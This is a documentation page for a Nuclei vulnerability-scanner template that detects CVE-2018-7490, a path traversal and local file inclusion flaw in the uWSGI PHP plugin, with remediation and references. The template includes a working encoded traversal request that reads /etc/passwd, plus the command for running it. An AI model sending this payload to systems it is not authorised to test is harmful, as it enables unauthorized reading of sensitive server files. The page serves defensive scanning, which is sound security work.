Skip to content
Nuclei Templates

uWSGI PHP Plugin Local File Inclusion

ID: CVE-2018-7490

Severity: high

Author: madrobot

Tags: cve2018,cve,uwsgi,php,lfi,plugin,edb,unbit

Description

Section titled “Description”

uWSGI PHP Plugin before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the —php-docroot option, making it susceptible to local file inclusion.

YAML Source

Section titled “YAML Source”
id: CVE-2018-7490


info:
  name: uWSGI PHP Plugin Local File Inclusion
  author: madrobot
  severity: high
  description: uWSGI PHP Plugin before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, making it susceptible to local file inclusion.
  impact: |
    An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Update to the latest version of uWSGI PHP Plugin or apply the necessary patches to fix the local file inclusion vulnerability.
  reference:
    - https://uwsgi-docs.readthedocs.io/en/latest/Changelog-2.0.17.html
    - https://www.exploit-db.com/exploits/44223/
    - https://www.debian.org/security/2018/dsa-4142
    - https://nvd.nist.gov/vuln/detail/CVE-2018-7490
    - https://github.com/jweny/pocassistdb
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-7490
    cwe-id: CWE-22
    epss-score: 0.9541
    epss-percentile: 0.99316
    cpe: cpe:2.3:a:unbit:uwsgi:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: unbit
    product: uwsgi
  tags: cve2018,cve,uwsgi,php,lfi,plugin,edb,unbit


http:
  - method: GET
    path:
      - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"


    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"


      - type: status
        status:
          - 200
# digest: 490a0046304402202f49c2839dde147b9ed3678d33fd5bf268a795950d09f0374de89b99929e7bbf022026327c1d755c9cbf2b55580bfc169e321910dceef6380fff28735fedb7200464:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-7490.yaml"

View on Github